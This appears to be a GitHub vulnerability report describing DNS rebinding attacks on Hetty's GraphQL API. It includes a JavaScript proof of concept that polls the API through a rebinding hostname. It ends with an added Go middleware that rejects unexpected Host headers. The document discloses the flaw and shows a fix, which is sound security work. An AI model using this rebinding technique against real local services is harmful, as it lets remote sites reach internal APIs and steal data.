
DNS rebinding attacks on Hetty's API #106

@randomstuff


Describe the bug

Hetty is vulnerable to DNS rebinding attacks because it does not validate the Host header.

A malicious remote server could exploit this to:

  • trigger arbitrary HTTP requests to other hosts from the Hetty server (this could be used to attack services on the local network, on localhost, or on the internet);
  • exfiltrate confidential data stored in Hetty.

Tested on 100.0a1 (2022-03-23).

I believe recent versions of Chrome are somehow protected against this type of attack.

See also https://www.gabriel.urdhr.fr/tags/dns-rebinding/ for more details in the context of other applications.

To Reproduce

function sleep(delay) {
  // Resolve after `delay` milliseconds so the loop can retry the request.
  return new Promise((resolve) => {
    setTimeout(resolve, delay);
  });
}

async function main() {
  // Keep issuing the same request to the page's own origin: once the rebinding
  // DNS name resolves to 127.0.0.1, the request reaches Hetty's API and succeeds.
  while (true) {
    try {
      const response = await fetch("/api/graphql/", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: `{"operationName":"CreateProject","variables":{"name":"ddd"},"query":"mutation CreateProject($name: String!) {\\n  createProject(name: $name) {\\n id\\n    name\\n    __typename\\n  }\\n}"}`,
      });
      if (response.status === 200) {
        alert("DONE!?");
        return;
      }
    } catch (e) {
      // Connection failures are expected while the name still resolves elsewhere.
    }
    await sleep(1000);
  }
}

main();

Served from a remote webserver such as:

http://a.192.0.2.1.1time.127.0.0.1.forever.9b173d68-dac5-4377-ba53-7a6473d130fe.rebind.network:8080/

Expected behavior

Requests coming from another origin should be rejected.

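The Host header check this report asks for, as an added example in Go (the language Hetty is written in) that is not part of Hetty's code base or of this report. The names `allowedHosts`, `hostAllowed` and `RequireKnownHost` are chosen here, and the example assumes the server is bound to localhost, so only loopback names and addresses are accepted:

```go
package main

import (
	"net"
	"net/http"
	"strings"
)

// allowedHosts is the set of hostnames this server expects in the Host header.
// Assumption for this example: the server listens on localhost only; a deployment
// on another interface would add its configured hostname here.
var allowedHosts = map[string]bool{"localhost": true}

// hostAllowed reports whether a Host header value (host or host:port) names one of
// allowedHosts or a loopback IP. Any other value means the client reached us through
// a DNS name we do not control, which is exactly what DNS rebinding relies on:
// the browser still sends the attacker's hostname in the Host header.
func hostAllowed(hostHeader string) bool {
	host := hostHeader
	if h, _, err := net.SplitHostPort(hostHeader); err == nil {
		host = h // strip the port when one is present
	}
	host = strings.TrimSuffix(strings.ToLower(host), ".")
	if allowedHosts[host] {
		return true
	}
	if ip := net.ParseIP(strings.Trim(host, "[]")); ip != nil {
		return ip.IsLoopback() // 127.0.0.0/8 and ::1
	}
	return false
}

// RequireKnownHost wraps a handler and rejects any request whose Host header is
// not allowed, before it can reach the API underneath.
func RequireKnownHost(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !hostAllowed(r.Host) {
			http.Error(w, "forbidden: unexpected Host header", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	// Stand-in for the API handler (constructed for this example).
	api := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.Write([]byte("ok\n")) })
	http.ListenAndServe("127.0.0.1:8080", RequireKnownHost(api))
}
```

With the middleware in place, the polling script above keeps receiving 403 responses, because the browser continues to send the rebinding hostname in the Host header even after the name resolves to 127.0.0.1.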
